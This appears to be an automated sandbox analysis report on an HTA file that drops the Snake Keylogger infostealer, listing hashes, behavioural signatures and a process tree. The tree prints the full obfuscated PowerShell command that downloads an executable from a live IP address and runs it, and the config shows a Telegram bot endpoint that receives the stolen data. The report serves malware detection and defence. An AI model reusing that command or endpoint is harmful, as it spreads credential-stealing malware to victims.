Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 15:17
Static task
static1
Behavioral task
behavioral1
Sample
seethebesthtmlthingsreadyforgetme.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
seethebesthtmlthingsreadyforgetme.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebesthtmlthingsreadyforgetme.hta
-
Size
129KB
-
MD5
03140c0995d8db21fe4fb2f030322615
-
SHA1
0199286b876a0d3e896b1830ff024555374e51f3
-
SHA256
95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305
-
SHA512
9f2682368cd24bf210edf0ec6d286d016a89b5fba4649fdd76d18bdc7f1cbc4dfb079079d074756dbfcf6377c1e34d6b59664df6ca7a8e6770af2fce704e09f9
-
SSDEEP
96:Eam780jLy6w80jLyrdUwSdffYJMK0jLyqx0jLyt0Aj5OtG80jLy987T:Ea280f7w80fCUpdWMK0fd0fX5A80fGCT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/4472-91-0x0000000000190000-0x00000000001B6000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 4876 PowERShELL.Exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 4876 PowERShELL.Exe 4944 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 4632 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023cab-75.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4632 set thread context of 4472 4632 taskhostw.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3576 4632 WerFault.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowERShELL.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4876 PowERShELL.Exe 4876 PowERShELL.Exe 4944 powershell.exe 4944 powershell.exe 4472 RegSvcs.exe 4472 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4632 taskhostw.exe 4632 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4876 PowERShELL.Exe Token: SeDebugPrivilege 4944 powershell.exe Token: SeDebugPrivilege 4472 RegSvcs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4676 wrote to memory of 4876 4676 mshta.exe 84 PID 4676 wrote to memory of 4876 4676 mshta.exe 84 PID 4676 wrote to memory of 4876 4676 mshta.exe 84 PID 4876 wrote to memory of 4944 4876 PowERShELL.Exe 88 PID 4876 wrote to memory of 4944 4876 PowERShELL.Exe 88 PID 4876 wrote to memory of 4944 4876 PowERShELL.Exe 88 PID 4876 wrote to memory of 5008 4876 PowERShELL.Exe 93 PID 4876 wrote to memory of 5008 4876 PowERShELL.Exe 93 PID 4876 wrote to memory of 5008 4876 PowERShELL.Exe 93 PID 5008 wrote to memory of 4824 5008 csc.exe 94 PID 5008 wrote to memory of 4824 5008 csc.exe 94 PID 5008 wrote to memory of 4824 5008 csc.exe 94 PID 4876 wrote to memory of 4632 4876 PowERShELL.Exe 97 PID 4876 wrote to memory of 4632 4876 PowERShELL.Exe 97 PID 4876 wrote to memory of 4632 4876 PowERShELL.Exe 97 PID 4632 wrote to memory of 4472 4632 taskhostw.exe 98 PID 4632 wrote to memory of 4472 4632 taskhostw.exe 98 PID 4632 wrote to memory of 4472 4632 taskhostw.exe 98 PID 4632 wrote to memory of 4472 4632 taskhostw.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebesthtmlthingsreadyforgetme.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\SysWOW64\WInDoWspOwERsHell\v1.0\PowERShELL.Exe"C:\Windows\SYStEM32\WInDoWspOwERsHell\v1.0\PowERShELL.Exe" "POwersHelL -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE ; Iex($(iEx('[sYStEM.TEXt.enCodInG]'+[cHaR]58+[chAr]0X3a+'UTf8.gETSTRInG([SYSTEm.COnVert]'+[ChaR]58+[ChAR]0X3A+'FroMbASE64strINg('+[ChAR]0X22+'JG44ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlckRFZklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1tVkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd1pEdUhyU0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6cUxySWYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUN1bGdiLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmlmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkp4dkVqQU9mV0RaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2V1USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG44OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMjgwL3Rhc2tob3N0dy5leGUiLCIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSdC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[chAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bry4mfiy\bry4mfiy.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC217.tmp" "c:\Users\Admin\AppData\Local\Temp\bry4mfiy\CSC72D13885176425B931193F75022F6.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:4824
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 7484⤵
- Program crash
PID:3576
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4632 -ip 46321⤵PID:1836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD5cba907e0560185c9357cad53316a3372
SHA1807056d5dab6a1b3857768f3eb93ad1f370fee2f
SHA2566209917cbc8415489c8e098c11bca5bfacbc695dc147b5921a7b51b4afd5a4ba
SHA5122d6bc691cc8130ad51ca172753d711f1a2dfab982261153202184dd52002c917d8f4fcf5bb73f1cb5e55313b0c139445a273e43dcd9a17d7d6fca69aea15c71c
-
Filesize
1KB
MD58eb5aa942eb12957d022d366d42c7c7f
SHA1b8e8b0ee5f668a96f684e8ea10892971d7c38fb6
SHA2560c33fe17a9bb0b020850dc75d9dd8ea5c41b34175813416234f132a10bd75ec1
SHA51249fa4577b13c7ef2fc0f1df320de97ae3840b6ff60d2d04b740ca37c5e3040f4c02d9405556c5174b885b0c3f4bd6d1fa777bda190eb96423d7f78538c5f7eb4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD50fbdb48efd960141037c997733ef19a6
SHA1cff096efd2df4fa8f10bb1a7753ef633b3165bc5
SHA2563953672cd93fd13e44d62cb1b84cab8c1d148cf9db7de2660cd34ac2656707ec
SHA512d33211441d08d99cf79c1b6e26052cc630d517646799852b1b0c6f684d8a09417e4443b5fe4b8b0168d7a376d03917971672526803509177ada828fdbb5bab55
-
Filesize
935KB
MD5daaa8ac3995fb610eda2e52a639d191f
SHA12a26a631b79878c461248d5c03a33fb312aedb05
SHA256e82aa9f8f95f53d306db35e28e6fdd4dd16eba7d7437971f929d3cf5470267b7
SHA512808c18d514439aead5759bd3d1bfbfb1b31cfb6c03a147db8525aa8f7dec30fb4b73a12b4e4310f97b9917f6513594d917184434f49ff9a5ee1870c46ae75157
-
Filesize
652B
MD5c36728e0405a43f5f51baec3c37ceac0
SHA1c39f894924df8e5c1a12cbf57c90c64dd56c92a4
SHA2565a0625fecc2e6a12c33bf4a0939e621df28f3ee12d70f1057b17eadb77ee7cc4
SHA51273a6e454704854d87505717446034d80cc5ee26d5e2265a549a5aed279f0b53fe2e6c19e845b40cba1aeaa2a5cd70a948340a4b244c2e4de4ec3b53e8f135a56
-
Filesize
474B
MD50e03065f874d09489b23d564815660e8
SHA1005cc140f8d9ad68a7863aee4da445e466c98379
SHA2569600c5f95e6b296008011163196ad864c684b50e172ea35f0ca140ce577c75f1
SHA512a55b8c7d5656c0c854da908ecf6bcc64f9520b61ff21154aa548e01dbd69ffd762806c09b3ec331d94b23b6145b48e2e649ead07dab8d73a17bc2a6981800d10
-
Filesize
369B
MD5220d3b9ac49d5ae15af2f1b8cafe283c
SHA144b44f039d52ab0e60520a4f8bebdd136f994750
SHA2565a8ff8739e56b627af06e312d83247ce575dc681ec4aa951bfaf757debceb930
SHA512a70a9fc16165cb980386833deabe4a2ea7d5aad77bdb6b9daf3df51792ea2424b0862f8da003759a737f4d2ae1b8359775f6c2a1d95770fdd9eebd291ecf9d61